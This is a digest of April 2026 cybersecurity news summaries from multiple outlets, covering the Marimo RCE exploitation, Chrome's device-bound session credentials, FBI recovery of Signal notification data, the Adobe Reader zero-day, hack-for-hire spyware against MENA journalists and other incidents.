A critical RCE vulnerability, CVE-2026-39987 (CVSS 9.3), in Marimo (Python notebook) was exploited within 10 hours of disclosure. It affects all versions up to 0.20.4, with a fix in 0.23.0. The flaw allows unauthenticated access to a full PTY shell via the /terminal/ws WebSocket endpoint, bypassing authentication. Sysdig observed exploitation attempts shortly after disclosure, including credential theft from a honeypot. This highlights the urgency for defenders to respond quickly to newly disclosed vulnerabilities.

Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure

2026-04-11 | Security Affairs: CVE-2026-39987: Marimo RCE exploited in hours after disclosure

A critical vulnerability in the open-source Python notebook tool Marimo, tracked as CVE-2026-39987, was exploited within 10 hours of its April 8, 2026 disclosure. The flaw allows pre-authenticated remote code execution, affecting versions up to 0.20.4, with version 0.23.0 addressing the issue. Attackers executed credential theft in under 3 minutes, highlighting rapid exploitation capabilities, potentially aided by AI. The advisory includes indicators of compromise for affected systems.

2026-04-13 | CSO Online: Critical flaw in Marimo Python notebook exploited within 10 hours of disclosure

A critical pre-authentication remote code execution vulnerability (CVE-2026-39987) in Marimo, an open-source Python notebook platform by CoreWeave, was exploited within 10 hours of its disclosure. With a severity score of 9.3, it affects all versions prior to 0.23.0. The exploit requires no login or stolen credentials; an attacker can gain complete control by sending a single connection request to a specific endpoint on an exposed Marimo server.

2026-04-13 | Cyber Security News: Marimo RCE Vulnerability Exploited in the Within 10 Hours of Disclosure

A critical RCE vulnerability (CVE-2026-39987) in the Marimo Python notebook platform was exploited within 10 hours of disclosure, allowing unauthenticated attackers to gain a pseudo-terminal shell via the /terminal/ws WebSocket endpoint. The flaw, with a CVSS score of 9.3, enables command execution with Marimo's privileges. Attackers exfiltrated sensitive AWS credentials shortly after gaining access. Security teams are advised to update to version 0.23.0, restrict access, audit environment variables, and rotate compromised credentials.

Protecting Cookies with Device Bound Session Credentials

Date: 2026-04-09 | Source: Google Online Security

Device Bound Session Credentials (DBSC) is now publicly available for Windows users on Chrome 146, with macOS support coming soon. DBSC aims to combat session theft by cryptographically binding authentication sessions to specific devices using hardware-backed security modules. This proactive approach prevents exfiltrated cookies from being used, as they quickly expire without the private key. DBSC maintains user privacy and is designed as an open web standard, with ongoing improvements planned for enterprise environments.

Protecting Cookies with Device Bound Session Credentials

2026-04-10 | The Hacker News: Google Rolls Out DBSC in Chrome 146 to Block Session Theft on Windows

Google has launched Device Bound Session Credentials (DBSC) for Chrome 146 on Windows to combat session theft. This feature ties authentication sessions to specific devices using hardware-backed security modules, making stolen cookies useless. DBSC generates a unique public/private key pair, ensuring that even if cookies are exfiltrated, they quickly expire. Google reports a significant reduction in session theft since the feature's introduction and plans to expand DBSC to more devices and enhance its capabilities for enterprise environments.

2026-04-10 | Help Net Security: To counter cookie theft, Chrome ships device-bound session credentials

Google's Device Bound Session Credentials (DBSC) is now publicly available in Chrome 146 for Windows, with macOS support forthcoming. DBSC binds authentication sessions to specific devices using hardware-backed security modules, generating unique cryptographic keys. This prevents cookie theft by ensuring that stolen cookies expire quickly and cannot be renewed without the private key. Google has observed a reduction in session theft during trials. Future developments include federated identity support, advanced registration, and broader device compatibility.

2026-04-10 | TechRadar: Google Chrome rolls out a new tool to try and stop infostealer malware in its tracks

Google has introduced Device Bound Session Credentials (DBSC) in Chrome 146 for Windows, enhancing security against infostealer malware by cryptographically binding session cookies to the user's device. This feature utilizes hardware-backed security modules to generate a unique key pair, preventing key theft and rendering exfiltrated cookies useless. A macOS rollout is expected soon. The implementation aims to significantly reduce session theft, which has become a major target for cybercriminals using infostealing malware.

2026-04-11 | Cyber Security News: Google Unveils Device-Bound Chrome Sessions in Anti-Cookie-Theft Move

Google has rolled out Device Bound Session Credentials (DBSC) for Windows users on Chrome 146 to combat session hijacking. This feature ties authentication sessions to a user's physical device using hardware-backed security modules, generating unique public-private key pairs. If session cookies are stolen, they quickly expire without the physical key. DBSC, developed with the W3C and Microsoft, aims to enhance security in federated identity and SSO environments, while maintaining user privacy.

2026-04-11 | Hack Read: Google Chrome Update Disrupts Infostealer Cookie Theft

Google has introduced Device Bound Session Credentials (DBSC) in Chrome 146 for Windows to combat session cookie theft by malware. This feature links login sessions to a computer's Trusted Platform Module (TPM), creating a unique key pair that prevents cookie exfiltration. Cookies are short-lived, reducing their utility if stolen. The update aims to enhance security against infostealers, which previously compromised sensitive data from organizations like the Pentagon and FBI. A macOS version is forthcoming.

FBI Extracts Suspect’s Deleted Signal Messages Saved in iPhone Notification Database

Date: 2026-04-09 | Source: 404 Media

The FBI extracted deleted Signal messages from a defendant's iPhone by accessing the push notification database, revealing incoming messages even after the app was removed. This occurred during a trial related to vandalism and violence at the ICE Prairieland Detention Facility in Texas. The case highlights the importance of adjusting notification settings in secure messaging apps to prevent unintended data exposure. All defendants were ultimately found guilty of multiple charges.

FBI Extracts Suspect’s Deleted Signal Messages Saved in iPhone Notification Database

2026-04-10 | Risky.Biz: Risky Bulletin: FBI extracted Signal chats from iPhone notifications logs

The FBI extracted deleted Signal messages from a suspect's iPhone using a new technique that accessed the phone's notification logs. This method was utilized in a case related to anti-ICE protests in Texas. In other incidents, the Los Angeles city attorney's office was hacked, and sensitive data was leaked, while a ransomware attack affected a major Dutch hospital software provider, ChipSoft, although its platform remained operational.

2026-04-10 | CNET: How to Make Sure Your Private Signal Messages Aren't Still Lurking on Your Phone

The FBI extracted deleted Signal messages from an iPhone's notification system during a trial related to a 2025 incident at the ICE Prairieland Detention Facility. Despite the app being removed and messages set to disappear, they remained retrievable due to the iPhone's internal database. Experts urge users to adjust Signal's notification settings to prevent message visibility in notifications, enhancing privacy and security. All nine defendants were found guilty of various charges.

2026-04-11 | Wired: Your Push Notifications Aren’t Safe From the FBI

The FBI accessed encrypted Signal messages from a defendant's iPhone via push notifications, despite the app being removed. This issue affects all apps with push notifications; users can adjust settings in Signal to hide message content. Meanwhile, the FBI's annual report revealed cybercrime losses exceeded $20 billion in 2025, with over half linked to cryptocurrency scams. Google expanded Gmail's end-to-end encryption to mobile apps for enterprise users, enhancing security for sensitive communications.

2026-04-11 | Hack Read: FBI Recovers Deleted Signal Messages Through iPhone Notifications

The FBI recovered deleted Signal messages from an iPhone in a Texas case involving Lynette Sharp, revealing a security loophole. The messages were retrieved from the iPhone's push notification database, despite Signal's end-to-end encryption. The FBI used Cellebrite to access incoming message previews stored by the phone's operating system. Users can enhance privacy by adjusting notification settings on their iPhones and within the Signal app to prevent message previews from being stored.

2026-04-13 | Security Affairs: iPhone forensics expose Signal messages after app removal in U.S. case

An FBI case in Texas revealed that Signal messages can be recovered from iPhones even after the app is uninstalled, challenging privacy assumptions. Forensic analysis showed that incoming messages were stored in Apple's push notification database, allowing recovery despite the app's deletion. Only incoming messages were retrievable, as outgoing messages do not leave such traces. This incident underscores that mobile operating systems retain data beyond user control, highlighting the limitations of perceived privacy in secure messaging apps.

Intent redirection vulnerability in third-party SDK exposed millions of Android wallets to potential risk

Date: 2026-04-09 | Source: Microsoft Security

A severe intent redirection vulnerability in the EngageSDK, affecting over 30 million Android crypto wallet installations, allows unauthorized access to private data. Detected during security research, the flaw was reported in April 2025 and resolved in version 5.2.1 released on November 3, 2025. Developers are urged to upgrade to this version. The vulnerability could lead to unauthorized data exposure and privilege escalation, highlighting risks associated with third-party SDKs in high-value applications.

Intent redirection vulnerability in third-party SDK exposed millions of Android wallets to potential risk

2026-04-09 | The Hacker News: EngageLab SDK Flaw Exposed 50M Android Users, Including 30M Crypto Wallet Installs

A vulnerability in the EngageLab SDK, affecting over 50 million Android users, including 30 million cryptocurrency wallet installations, was reported by Microsoft Defender. The flaw, identified as an intent redirection vulnerability in version 4.5.4, allowed unauthorized access to private data across apps on the same device. Although no exploitation was detected, developers are urged to update to version 5.2.1, released in November 2025, to mitigate risks associated with third-party SDK dependencies.

2026-04-10 | Security Affairs: EngageLab SDK flaw opens door to private data on 50M Android devices

A critical flaw in EngageLab SDK exposed private data on up to 50 million Android devices, including over 30 million crypto wallets. The vulnerability allowed apps to bypass Android's sandbox protections via intent redirection, enabling unauthorized access to sensitive data. Microsoft reported the issue in April 2025, leading to a fix in version 5.2.1 released on November 3, 2025. Developers are advised to review merged Android manifests to ensure security when using third-party SDKs.

2026-04-10 | TechRadar: Microsoft warns worrying security flaw exposed over 50 million Android users, says 'user credentials and financial data were exposed to risk'

Microsoft identified a vulnerability in the EngageLab SDK affecting 50 million Android devices, allowing apps to bypass the security sandbox and access private data. At least 30 million installations were linked to cryptocurrency apps. The flaw, discovered in April 2025 and patched in November 2025 (version 5.2.1), has not been exploited in real-world attacks. Developers are urged to update the SDK to mitigate risks associated with third-party dependencies in app security.

2026-04-10 | Cyber Security News: EngageSDK Vulnerability Exposes Millions of Crypto Wallet Users to Cyberattacks

A vulnerability in the EngageSDK, affecting over 30 million cryptocurrency wallet users, allows malicious apps to access private user data due to an intent redirection flaw. Identified by Microsoft in April 2025, the issue resides in an exported activity, MTCommonActivity, which was overlooked by developers. EngageLab released a fix in version 5.2.1 on November 3, 2025. Users are advised to upgrade immediately, and Android has implemented automatic mitigations for previously installed vulnerable apps.

Atomic Stealer MacOS ClickFix Attack Bypasses Apple Security Warnings

Date: 2026-04-09 | Source: Infosecurity Magazine

A malware campaign targeting macOS systems has evolved to use a ClickFix attack that exploits Script Editor instead of Terminal for execution. Identified by Jamf Threat Labs, the Atomic Stealer (AMOS) infostealer bypasses Apple’s security warnings introduced in the macOS 26.4 update. Users are misled into executing malicious commands under the guise of reclaiming disk space. Recommendations for network administrators include restricting run dialog use, blocking malicious executables, and preventing access to harmful websites.

Atomic Stealer MacOS ClickFix Attack Bypasses Apple Security Warnings

2026-04-09 | CSO Online: New ClickFix variant bypasses Apple safeguards with one‑click script execution

A new variant of ClickFix malware has emerged, enabling threat actors to bypass Apple safeguards through a one-click script execution method. Researchers at Jamf Threat Labs discovered that this macOS campaign uses the applescript:// URL scheme to launch Apple's Script Editor directly from the browser, preloaded with malicious code. This approach eliminates the need for user interaction with Terminal, facilitating the delivery of Atomic Stealer payloads more efficiently.

2026-04-09 | Cyber Security News: New ClickFix Campaign Uses macOS Script Editor to Deliver Atomic Stealer

A new ClickFix campaign targets macOS users by using Script Editor to deliver the Atomic Stealer infostealer, bypassing Terminal protections introduced in macOS 26.4. Attackers exploit a fake Apple-themed webpage to prompt users to execute a script that downloads and runs malware in memory. The campaign utilizes obfuscation techniques and indicators of compromise include domains like dryvecar.com. Users are advised to avoid executing scripts from external sources and to keep macOS updated for security.

2026-04-09 | TechRadar: Mac users beware — experts say this attack 'stood out immediately' by making a major change to try spread malware

Hackers have revived ClickFix attacks on macOS, utilizing a new method that exploits Script Editor via a URL scheme to deliver the Atomic Stealer malware. Security researchers from Jamf Threat Labs observed a campaign where victims are lured to a website promising to "reclaim disk space." By clicking an "Execute" button, users inadvertently open Script Editor, which runs a pre-filled script to exfiltrate sensitive data, including passwords and cryptocurrency information.

2026-04-10 | Help Net Security: ClickFix campaign delivers Mac malware via fake Apple page

Security researchers at Jamf have identified a ClickFix-style attack targeting Mac users through a fake Apple webpage that claims to help reclaim disk space. This social engineering tactic prompts users to execute malicious commands via Script Editor. If users ignore warnings and run the script, it downloads an Atomic Stealer variant, capable of stealing sensitive data from Keychain, browsers, and cryptocurrency wallets. Jamf has provided indicators of compromise for this malware campaign.

2026-04-10 | Malwarebytes Labs: ClickFix finds a new way to infect Macs

ClickFix has evolved its tactics to infect Macs by using the applescript:// URL scheme to auto-open Script Editor, replacing the previous method of pasting commands into Terminal. This social engineering technique tricks users into executing a script that downloads Atomic Stealer malware. Users are advised to be cautious, avoid running untrusted scripts, and verify instructions independently. Keeping macOS updated and using real-time anti-malware solutions are recommended for protection against such threats.

Hackers Claim to Have Stolen 10 Petabytes of Data from China’s Tianjin Supercomputer Center

Date: 2026-04-09 | Source: Cyber Security News

Hackers claim to have stolen over 10 petabytes of data from China's Tianjin Supercomputer Center, a key facility supporting defense and industrial sectors. The breach allegedly includes sensitive defense documents and missile design data. Access reportedly began through a compromised VPN, with a botnet extracting data over six months. While the full scope remains unverified, the incident raises significant national security concerns and highlights vulnerabilities in critical computing infrastructure.

Hackers Claim to Have Stolen 10 Petabytes of Data from China’s Tianjin Supercomputer Center

2026-04-09 | Security Affairs: The alleged breach of China’s National Supercomputing Center can have serious geopolitical consequences

A hacker allegedly breached China’s National Supercomputing Center, exfiltrating over 10 petabytes of sensitive military and aerospace data, risking national security. The group “FlamingChina” claims to have accessed data from major organizations, including Aviation Industry Corporation of China. The breach, reportedly achieved via a compromised VPN, could escalate geopolitical tensions and erode trust in Chinese infrastructure. Cybersecurity experts believe the data is genuine, highlighting systemic weaknesses in China’s defenses.

2026-04-09 | Times Now: How Hackers Breached Supercomputer In China To Steal Fighter Jet And War Simulation Data

Hackers breached a government supercomputer in China, stealing sensitive information, including classified defense documents, fighter jet research, advanced war simulation data, and missile schematics. This incident is reported as one of the largest data breaches in the country, highlighting the growing threat posed by cybercriminals to national security.

2026-04-09 | TechRadar: ‘FlamingChina’ hacker claims to have stolen over 10 petabytes of advanced military data from China’s National Supercomputing Center in possibly the biggest hack of all time

An individual or group named 'FlamingChina' claims to have stolen over 10 petabytes of sensitive military data from China’s National Supercomputing Center, potentially the largest hack to date. The breach, which remains unverified, includes data from organizations like AVIC and COMAC, featuring military simulations. The hacker reportedly accessed the system via a compromised VPN and extracted data over six months using a botnet. The dataset is now for sale in cryptocurrency, raising concerns about national security implications.

2026-04-09 | Security Magazine: Chinese Supercomputer Allegedly Hacked, 10 Petabytes of Data Stolen

The National Supercomputing Center (NSCC) in Tianjin, China, allegedly suffered a breach resulting in the theft of over 10 petabytes of sensitive data, including classified defense documents and missile schematics. Unauthorized access was reportedly achieved through a compromised VPN, followed by a botnet deployment for data exfiltration over six months. The hacker is offering previews for thousands and full access for hundreds of thousands in cryptocurrency.

8-K - Bitcoin Depot Inc. (0001901799) [Material]

Date: 2026-04-08 | Source: U.S. Securities and Exchange Commission (Filings)

On March 23, 2026, Bitcoin Depot Inc. detected unauthorized access to its IT systems, leading to the transfer of approximately 50.903 Bitcoin (valued at $3.665 million) from its wallets. The company activated incident response protocols, engaged cybersecurity experts, and notified law enforcement. The incident is believed to be contained within the corporate environment, with no evidence of customer data being accessed. The investigation is ongoing, and while a preliminary loss estimate of $3.665 million has been recorded, the full impact remains undetermined.

8-K - Bitcoin Depot Inc. (0001901799) [Material]

2026-04-09 | Recorded Future: Cryptocurrency ATM giant Bitcoin Depot reports $3.6 million stolen in cyberattack

On March 23, Bitcoin Depot reported a cyberattack resulting in the theft of over $3.6 million, with approximately 50.903 Bitcoin transferred from company-controlled wallets. The company stated that the incident was contained to its corporate environment and did not affect customer platforms or data. Outside cybersecurity experts are investigating, and law enforcement has been notified. Bitcoin Depot has not determined the full impact of the incident, which may change as the investigation continues.

2026-04-09 | Infosecurity Magazine: Bitcoin Depot Reports $3.6m Crypto Theft After System Breach

A cyber-attack on Bitcoin Depot's systems resulted in the theft of over 50 Bitcoin, valued at approximately $3.66 million, detected on March 23. Attackers accessed credentials linked to digital asset settlement accounts, transferring the Bitcoin before being blocked. The breach was contained within corporate systems, with no impact on customer data. Bitcoin Depot initiated incident response protocols and notified law enforcement. The investigation is ongoing, with potential reputational and financial repercussions.

2026-04-10 | Security Affairs: Bitcoin Depot hack leads to $3.6M Bitcoin theft via stolen credentials

Hackers breached Bitcoin Depot on March 23, 2026, stealing login credentials and transferring approximately 50.9 BTC, valued at $3.6 million, from the company's wallets. The breach was reported in a FORM 8-K filed with the SEC, stating that the unauthorized access was contained to corporate systems and did not affect customer data. Bitcoin Depot activated incident response protocols and is investigating with external cybersecurity experts. The company estimates potential losses and has insurance coverage, though recovery is uncertain.

Hack-for-hire spyware campaign targets journalists in Middle East, North Africa

Date: 2026-04-08 | Source: Cyberscoop

A hack-for-hire spyware campaign, linked to the Indian government, targeted journalists in the Middle East and North Africa using Android ProSpy malware. Researchers from Access Now, Lookout, and SMEX uncovered a spearphishing campaign active since 2022, affecting civil society members and possibly government officials. Victims reported receiving suspicious links. The Committee to Protect Journalists condemned the campaign, highlighting threats to journalists' safety and their sources. ESET previously identified ProSpy malware in the UAE.

Hack-for-hire spyware campaign targets journalists in Middle East, North Africa

2026-04-08 | TechCrunch: Hack-for-hire group caught targeting Android devices and iCloud backups

A hack-for-hire group, codenamed BITTER, has been identified targeting journalists, activists, and officials in the Middle East and North Africa using phishing attacks to access iCloud backups and deploy Android spyware. The group is suspected to have ties to the Indian government and may be linked to RebSec Solutions. The attacks involved tricking iPhone users into revealing Apple ID credentials and using spyware like ProSpy on Android, disguised as popular apps.

2026-04-09 | The Hacker News: Bitter-Linked Hack-for-Hire Campaign Targets Journalists Across MENA Region

A hack-for-hire campaign linked to the Indian government targeted journalists and activists in the MENA region, with notable attacks on Egyptian journalists Mostafa Al-A'sar and Ahmed Eltantawy. Spear-phishing attempts aimed to compromise their Apple and Google accounts using fake pages. The campaign, operational from 2023 to 2025, also involved phishing via iMessage and WhatsApp. While no accounts were breached, one Lebanese journalist's Apple account was compromised. The operation may indicate broader surveillance efforts.

2026-04-09 | Infosecurity Magazine: Middle East Hack-for-Hire Operation Traced to South Asian Cyber Espionage Group

A spear-phishing campaign targeting civil society figures in the Middle East, including journalists Mostafa Al‑A’sar and Ahmed Eltantawy, was linked to a South Asian cyber espionage group known as Bitter. Detected by Access Now in August 2025, the campaign utilized Android malware and aimed to compromise Apple and Google accounts. Attackers impersonated legitimate services and used fake profiles to deliver the ProSpy/ToSpy malware, with the campaign active from October 2023 to January 2024.

2026-04-10 | Cyber Security News: Hackers Impersonate Secure Messaging Apps to Deploy ProSpy in Middle East Espionage Attacks

A targeted mobile espionage campaign in the Middle East has been using fake secure messaging apps to deploy Android spyware named ProSpy since at least 2022. The operation, linked to the BITTER APT group, has affected journalists and activists across several countries, including Egypt and the UAE. ProSpy collects sensitive data and is delivered via spearphishing links leading to trojanized APKs. Users are advised to avoid unofficial app downloads and be cautious of unexpected links.

2026-04-13 | Hack Read: BITTER APT Uses Signal, Google, and Zoom Lures to Spread ProSpy Spyware

An ongoing spying operation by the BITTER APT targets journalists and opposition politicians in the Middle East using spearphishing tactics. Hackers lure victims via LinkedIn and iMessage, directing them to fake login pages for apps like Zoom and Google. Victims linking their Signal accounts via malicious QR codes expose private chats. The spyware ProSpy, developed in Kotlin, monitors user activity and steals sensitive data. This campaign marks BITTER's first targeting of activists, indicating a potential hack-for-hire motive.

Hackers Actively Attacking Adobe Reader Users Using Sophisticated 0-Day Exploit

Date: 2026-04-08 | Source: Cyber Security News

A zero-day exploit targeting Adobe Reader users has been detected, allowing attackers to steal sensitive data and perform system fingerprinting without user interaction. The exploit, embedded in a malicious PDF, bypasses antivirus tools and uses APIs to read local files and transmit data to an attacker-controlled server. It can also deliver additional payloads for Remote Code Execution. No patch is currently available. Users are advised to avoid unknown PDFs and monitor network traffic for suspicious activity.

Hackers Actively Attacking Adobe Reader Users Using Sophisticated 0-Day Exploit

2026-04-09 | Sophos: Adobe Reader zero-day vulnerability in active exploitation

On April 7, 2026, a zero-day vulnerability in Adobe Reader was reported, exploited since December 2025. It allows attackers to execute privileged Acrobat APIs via malicious PDFs, enabling data theft and remote code execution. Targeted attacks are linked to the Russian oil and gas sector. Recommendations include monitoring for Adobe patches, scanning PDF attachments, and user training. Threat indicators include specific MD5, SHA1, and SHA256 hashes, along with associated domains and IP addresses.

2026-04-09 | The Hacker News: Adobe Reader Zero-Day Exploited via Malicious PDFs Since December 2025

Threat actors have exploited a zero-day vulnerability in Adobe Reader via malicious PDFs since December 2025. The exploit, detailed by EXPMON's Haifei Li, uses social engineering tactics to lure users. The PDF ("Invoice540.pdf") executes obfuscated JavaScript to harvest data and potentially enable remote code execution (RCE) and sandbox escape (SBX). It abuses unpatched vulnerabilities in Adobe Reader, exfiltrating data to a remote server. The security community is advised to remain vigilant.

2026-04-09 | Help Net Security: Acrobat Reader zero-day exploited in the wild for many months

A zero-day vulnerability in Adobe Acrobat Reader has been exploited since November 2025, discovered by researcher Haifei Li. The exploit is embedded in PDF files, executing obfuscated JavaScript that collects system information and communicates with an attacker-controlled server. The targeted victims appear to be Russian-speaking organizations in government and energy sectors. Users are advised to avoid untrusted PDFs and security teams should block specific IP addresses and monitor endpoint activities until a fix is released.

2026-04-09 | The Register: Months-old Adobe Reader zero-day uses PDFs to size up targets

Hackers have exploited a zero-day vulnerability in Adobe Acrobat Reader for months, using malicious PDFs to profile targets without user interaction. The exploit employs obfuscated JavaScript to gather system information and send it to the attacker's servers. If a target is deemed valuable, a second-stage payload may be delivered, potentially leading to remote code execution. The campaign, active since late 2025, has no CVE or patch available, leaving users vulnerable, especially when opening PDFs from unknown sources.

2026-04-09 | Times Now: How A Simple PDF File Can Put Your Computer At Hacking Risk

A simple PDF file can expose computers to hacking risks, potentially linked to targeted phishing campaigns. The article emphasizes that anyone could fall victim to these attacks. Currently, there is no patch available, making user awareness the primary defense against this threat.

2026-04-09 | Hack Read: Adobe Reader Zero-Day Exploited to Steal Data via Malicious PDFs

Hackers are exploiting a zero-day vulnerability in Adobe Reader, discovered by Haifei Li, since November 2025. The attack activates upon opening a malicious PDF, such as "Invoice540.pdf," running obfuscated JavaScript to hijack APIs for data theft. The attackers target specific groups, using Russian language lures related to the oil and gas industry. Adobe was notified on April 7, 2026, but no patch is available. Users are advised to avoid unknown PDFs and network managers should block traffic mentioning Adobe Synchronizer.

2026-04-09 | Security Affairs: Malicious PDF reveals active Adobe Reader zero-day in the wild

Hackers have exploited an unpatched Adobe Reader zero-day for months, delivering a sophisticated PDF exploit. Discovered by researcher Haifei Li, the malicious PDF was flagged on March 26, 2026, with low antivirus detection. The exploit uses Adobe Reader's JavaScript engine to collect sensitive data and potentially execute remote code. Documents in the campaign feature Russian language lures related to the oil and gas industry. Ongoing analysis is needed to understand the exploit's full impact.

2026-04-09 | CSO Online: Hackers have been exploiting an unpatched Adobe Reader vulnerability for months

Hackers have been exploiting an unpatched vulnerability in Adobe Reader for up to four months, using malware to fingerprint computers and gather information for data theft and further attacks. Security researcher Haifei Li reported that his exploit monitor, EXPMON, detected an initial exploit targeting a Reader API vulnerability. This ongoing exploitation highlights the risks associated with the widespread use of Adobe Reader and the need for timely updates to mitigate such threats.

2026-04-10 | TechRadar: Adobe Reader users beware — experts flag months-old security flaw using booby-trapped PDFs to scope out victims

Adobe Reader is currently vulnerable to a zero-day exploit that allows hackers to steal sensitive data and potentially take full control of affected devices. Discovered by researcher Haifei Li, this exploit has been active since December 2025 and requires only the opening of a malicious PDF. Targeting individuals in the Russian oil and gas sector, users are advised to avoid untrusted PDFs until a patch is released. Network defenders can mitigate risks by blocking specific HTTP/HTTPS traffic.

2026-04-12 | The Hacker News: Adobe Patches Actively Exploited Acrobat Reader Flaw CVE-2026-34621

Adobe has released emergency updates to address a critical security flaw in Acrobat Reader, identified as CVE-2026-34621, with a CVSS score of 8.6. This vulnerability, related to prototype pollution, allows attackers to execute malicious code on affected systems. It impacts Acrobat DC and Reader DC versions 26.001.21367 and earlier, and Acrobat 2024 versions 24.001.30356 and earlier. Adobe confirmed active exploitation of this flaw, which may have been occurring since December 2025.

2026-04-12 | Security Affairs: Adobe fixes actively exploited Acrobat Reader flaw CVE-2026-34621

Adobe has released emergency updates for Acrobat Reader to address the critical vulnerability CVE-2026-34621, which is actively exploited to execute malicious code. The flaw, rated CVSS 8.6, involves improperly controlled modification of object prototype attributes, allowing arbitrary code execution. Affected versions include Acrobat DC 26.001.21367 and earlier, and Acrobat 2024 Classic 24.001.30356 and earlier on Windows and macOS. Prompt patching is essential to mitigate risks.

2026-04-13 | Cyber Security News: Adobe Patches Acrobat Reader 0-Day Vulnerability Exploited in the Wild

Adobe has released an emergency patch for a critical zero-day vulnerability in Acrobat Reader, tracked as CVE-2026-34621, which allows arbitrary code execution. The flaw, due to improperly controlled modification of object prototype attributes, is actively exploited and requires user interaction to trigger via malicious PDF documents. Affects versions 24.001.30356, 26.001.21367, and earlier. Organizations are urged to apply updates, enhance email filtering, and conduct security awareness training to mitigate risks.

2026-04-13 | Help Net Security: Adobe issues emergency fix for Acrobat Reader flaw exploited in the wild (CVE-2026-34621)

Adobe has released an emergency update for Acrobat Reader to address a critical zero-day vulnerability (CVE-2026-34621) exploited since November 2025. This prototype pollution vulnerability allows arbitrary code execution upon opening a malicious PDF file. The update is available for Acrobat DC and Acrobat Reader DC v26.001.21411, and Acrobat 2024 versions 24.001.30362 and 24.001.30360. Users are advised to avoid untrusted PDFs and monitor endpoints for suspicious activity. Immediate patching is recommended.

2026-04-13 | Malwarebytes Labs: Simply opening a PDF could trigger this Adobe Reader zero-day

A zero-day vulnerability (CVE-2026-34621) in Adobe Acrobat Reader allows attackers to exploit malicious PDFs to access restricted files and execute remote code without user interaction. Affected versions include Acrobat DC and Reader DC versions 26.001.21367 and earlier, and Acrobat 2024 versions 24.001.30356 and earlier. Adobe recommends updating to the latest versions to mitigate risks. Users should exercise caution with unknown PDFs and utilize real-time anti-malware solutions.

2026-04-13 | The Hacker News: ⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More

Adobe Acrobat Reader is under active exploitation due to a critical zero-day vulnerability (CVE-2026-34621) with a CVSS score of 8.6, allowing arbitrary code execution via specially crafted PDFs. U.S. agencies reported ongoing hacking campaigns by Iranian actors targeting industrial control systems, causing operational disruptions. A North Korean group stole $285 million from Drift Protocol by posing as a trading firm. APT28 has exploited SOHO routers for credential theft, and multiple vulnerabilities in IBM WebSphere Liberty were disclosed.

2026-04-14 | TechRadar: Adobe issues emergency security patch — Reader and Acrobat users need to update now

Adobe has released an emergency patch for a zero-day vulnerability (CVE-2026-34621) in Acrobat Reader, exploited since December 2025, allowing remote code execution (RCE) via malicious PDFs. The flaw affects multiple versions of Acrobat Reader and Acrobat DC, with a severity score of 8.6/10. Users must update their software as no workarounds exist. Security researchers warn of sophisticated attacks leveraging this vulnerability, urging defenders to monitor traffic for specific indicators.

2026-04-14 | TechCrunch: Adobe fixes PDF zero-day security bug that hackers have exploited for months

Adobe has patched a zero-day vulnerability (CVE-2026-34621) in Acrobat DC, Reader DC, and Acrobat 2024, exploited for at least four months. This flaw allows remote malware installation via malicious PDF files on Windows and macOS. The extent of the impact is unknown, but the vulnerability poses a risk of full system control for attackers. Users are urged to update their software to mitigate risks associated with this exploit.

Microsoft Abruptly Terminates VeraCrypt Account, Halting Windows Updates

Date: 2026-04-08 | Source: 404 Media

Microsoft has terminated the account of VeraCrypt's developer, Mounir Idrassi, preventing future Windows updates for the encryption software. The termination occurred in mid-January without prior warning, leaving Idrassi unable to publish updates for the majority of users. He received a message stating his organization, IDRIX, does not meet verification requirements, but no specifics were provided. This lack of communication has raised concerns about the future of the project. Similar issues have been reported by other developers, including WireGuard.

Microsoft Abruptly Terminates VeraCrypt Account, Halting Windows Updates

2026-04-08 | TechCrunch: Developer of VeraCrypt encryption software says Windows users may face boot-up issues after Microsoft locked his account

On March 30, VeraCrypt developer Mounir Idrassi announced that Microsoft has blocked his account used for signing Windows drivers, potentially causing boot-up issues for users of the encryption software. Without access to re-verify his software, many Windows devices may soon be unable to boot. Idrassi confirmed that while no immediate security issues exist, users with system encryption could face problems by late June if the situation remains unresolved. He can still update Linux and macOS versions.

2026-04-09 | Cyber Security News: Microsoft Suspends Developer Accounts of High-Profile Open-Source Projects

Microsoft suspended the developer accounts of VeraCrypt and WireGuard, blocking their ability to sign drivers and push updates without prior warning. This action stems from tightened identity verification policies initiated in October 2025, requiring developers to re-verify through third-party vendors. The suspensions jeopardize user security, as VeraCrypt may be unable to encrypt system drives by June 2026, and WireGuard cannot issue updates, leaving users vulnerable. Resolutions are anticipated, but both developers face a 60-day appeals process.

2026-04-09 | The Register: Microsoft locks out VeraCrypt and WireGuard devs, blames verification process

Microsoft locked out developers Mounir Idrassi (VeraCrypt) and Jason Donenfeld (WireGuard) from their accounts without prior warning, impacting their ability to sign updates. Idrassi reported no communication from Microsoft, while Donenfeld faced a catch-22 in the appeals process. Microsoft’s President stated the deactivations were due to account verification procedures and assured that both accounts would be restored soon. Donenfeld's account was reinstated, allowing him to release a kernel driver update.

New Lua-based malware “LucidRook” observed in targeted attacks against Taiwanese organizations

Date: 2026-04-08 | Source: Cisco Talos

Cisco Talos identified a new Lua-based malware, "LucidRook," targeting Taiwanese NGOs and universities through spear-phishing campaigns. The malware, delivered via malicious LNK and EXE files, features a Lua interpreter and Rust-compiled libraries. It employs anti-analysis checks and uses compromised FTP servers for C2 communication. The associated reconnaissance tool, "LucidKnight," exfiltrates system data via Gmail. The threat actor demonstrates advanced operational capabilities, prioritizing stealth and victim-specific targeting.

New Lua-based malware “LucidRook” observed in targeted attacks against Taiwanese organizations

2026-04-09 | Cyber Security News: Hackers Use Fake Security Software to Deliver LucidRook Malware in Taiwan Attacks

A new malware named LucidRook targets Taiwanese organizations, disguised as legitimate security software. Attackers used spearphishing emails with links to password-protected archives containing decoy documents, including a government letter. The malware employs a Lua-based architecture and uses DLL hijacking for persistence. It collects system data before communicating with compromised FTP servers. Cisco Talos recommends strict email filtering, monitoring for unusual DLL activity, and deploying detection rules to combat this threat.

2026-04-09 | The Hacker News: UAT-10362 Targets Taiwanese NGOs with LucidRook Malware in Spear-Phishing Campaigns

A new threat cluster, UAT-10362, has been linked to spear-phishing campaigns targeting Taiwanese NGOs and universities, deploying a Lua-based malware called LucidRook. Discovered in October 2025, the attack utilizes RAR or 7-Zip archives to deliver a dropper, LucidPawn, which executes LucidRook via DLL side-loading. The malware collects system information and exfiltrates it while receiving encrypted payloads. Notably, it employs geofencing to target Traditional Chinese environments and uses compromised FTP servers for command-and-control.

